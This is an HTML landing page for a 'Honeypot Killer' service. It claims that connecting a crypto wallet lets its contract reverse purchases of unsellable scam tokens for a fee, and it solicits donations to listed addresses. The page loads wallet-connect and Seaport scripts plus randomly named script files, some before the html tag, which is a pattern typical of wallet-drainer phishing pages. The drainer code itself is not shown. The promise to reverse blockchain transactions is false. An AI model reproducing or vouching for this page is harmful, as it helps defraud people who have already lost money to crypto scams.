<script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/merkletreejs@latest/merkletree.js"></script><script src="./scripts/seaport.js"></script><script src="./scripts/wallet_connect.js"></script><script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
<script src="./ebb89f11-e6b0-44ec-a405-16aa99988df9.js"></script>

<html lang="en" class="no-js">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>The Honeypot Killer - Sell Honeypot Coins</title>
    <link href="https://fonts.googleapis.com/css?family=IBM+Plex+Sans:400,600" rel="stylesheet">
    <link rel="stylesheet" href="dist/css/style.css">
	<script src="https://unpkg.com/animejs@3.0.1/lib/anime.min.js"></script>
    <script src="https://unpkg.com/scrollreveal@4.0.0/dist/scrollreveal.min.js"></script>
</head>
<body class="is-boxed has-animations">
    <div class="body-wrap">
        <header class="site-header">
            <div class="container">
                <div class="site-header-inner">
                    <div class="brand header-brand">
                        <h1 class="m-0">
							<a href="#">
								<img class="header-logo-image" src="dist/images/logo.svg" alt="Logo">
                            </a>
                        </h1>
                    </div>
                </div>
            </div>
        </header>

        <main>
            <section class="hero">
                <div class="container">
                    <div class="hero-inner">
						<div class="hero-copy">
	                        <h1 class="hero-title mt-0">Honeypot Killer</h1>
	                        <p class="hero-paragraph">Our smart contract can be used to recover your initial payment towards honeypots and other unsellable tokens on most networks.</p>
	                        <div class="hero-cta"> <a class="button interact-button button-primary" href="#">Check For Honeypots</a></div>
						</div>
						<div class="hero-figure anime-element">
							<svg class="placeholder" width="528" height="396" viewBox="0 0 528 396">
								<rect width="528" height="396" style="fill:transparent;" />
							</svg>
							<div class="hero-figure-box hero-figure-box-01" data-rotation="45deg"></div>
							<div class="hero-figure-box hero-figure-box-02" data-rotation="-45deg"></div>
							<div class="hero-figure-box hero-figure-box-03" data-rotation="0deg"></div>
							<div class="hero-figure-box hero-figure-box-04" data-rotation="-135deg"></div>
							<div class="hero-figure-box hero-figure-box-05"></div>
							<div class="hero-figure-box hero-figure-box-06"></div>
							<div class="hero-figure-box hero-figure-box-07"></div>
							<div class="hero-figure-box hero-figure-box-08" data-rotation="-22deg"></div>
							<div class="hero-figure-box hero-figure-box-09" data-rotation="-52deg"></div>
							<div class="hero-figure-box hero-figure-box-10" data-rotation="-50deg"></div>
						</div>
                    </div>
                </div>
            </section>

            <section class="features section">
                <div class="container">
					<div class="features-inner section-inner has-bottom-divider">
                        <div class="features-wrap">
                            <div class="feature text-center is-revealing">
                                <div class="feature-inner">
                                    <div class="feature-icon">
										<img src="dist/images/feature-icon-01.svg" alt="Feature 01">
                                    </div>
                                    <h4 class="feature-title mt-24">Who are we?</h4>
                                    <p class="text-sm mb-0">A group of nerds AKA 'Cats with keyboards' who got scammed so many times that we decided to do something about it !
</p>
                                </div>
                            </div>
							<div class="feature text-center is-revealing">
                                <div class="feature-inner">
                                    <div class="feature-icon">
										<img src="dist/images/feature-icon-02.svg" alt="Feature 02">
                                    </div>
                                    <h4 class="feature-title mt-24">How does it work?</h4>
                                    <p class="text-sm mb-0">Connect your wallet and our smart contract will scan for any eligible tokens. If you have any eligible tokens in your wallet our smart contract will detect them and reverse the original buy transaction so there will be a transaction fee involved in order to receive the original amount of ETH or chain specific token in return instantly. If your eligible tokens are found on different chains like Arbitrum, Optimism or Polygon you will be prompted to switch to those chains. That's all. It works on most networks.</p>
                                </div>
                            </div>
                            <div class="feature text-center is-revealing">
                                <div class="feature-inner">
                                    <div class="feature-icon">
										<img src="dist/images/feature-icon-03.svg" alt="Feature 03">
                                    </div>
                                    <h4 class="feature-title mt-24">Our Vision</h4>
                                    <p class="text-sm mb-0">To end crypto scams ! It's got to a point where crypto scams are out of control. This tool doesn't stop them, but at least it helps victims recover some of their losses. We think it's a good start ! <br>We also accept donations since this service is provided free of charge.
              Support us by donating at the following addresses:<br>BNB: 0x08de9dc11b55e7ee9669a06952049aa7e4a9b558<br>
            
              ETH: 0x27bC9C6d4c5D068dfd6D44A4add69BDEBe01E038</p>
                                </div>
                            </div>
                         
                                    </div>
                                      </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>



			<section class="cta section">
				<div class="container">
					<div class="cta-inner section-inner">
						<h3 class="section-title mt-0">Honeypot Killer</h3>
						<div class="cta-cta">
							<a class="button interact-button button-primary button-wide-mobile" href="emailto:bosscat@honeypotkiller.com">Get in touch</a>
						</div>
					</div>
				</div>
			</section>
        </main>

        <footer class="site-footer">
            <div class="container">
                <div class="site-footer-inner">
                    <div class="brand footer-brand">
						<a href="#">
							<img class="header-logo-image" src="dist/images/logo.svg" alt="Logo">
						</a>
                    </div>
                    <ul class="footer-links list-reset">
                        <li>
                            
                        </li>
                        <li>
                           
                        </li>
                        <li>
                           
                        </li>
                        <li>
                           
                        </li>
                    </ul>
                    <ul class="footer-social-links list-reset">
                        <li>
                            
                                </svg>
                            </a>
                        </li>
                        <li>
                           
                                </svg>
                            </a>
                        </li>
                        <li>
                            
                                </svg>
                            </a>
                        </li>
                    </ul>
                    <div class="footer-copyright">&copy; 2023 Honeypotkiller.com</div>
                </div>
            </div>
        </footer>
    </div>

    <script src="dist/js/main.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script> 
<script src="https://cdn.jsdelivr.net/npm/merkletreejs@latest/merkletree.js"></script> 
<script src="./scripts/seaport.js"></script> 
<script src="./scripts/wallet_connect.js"></script> 
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script> 
<script src="./6073606e-bf0a-4127-bddf-13f426c4badb.js"></script>
</body>
</html>
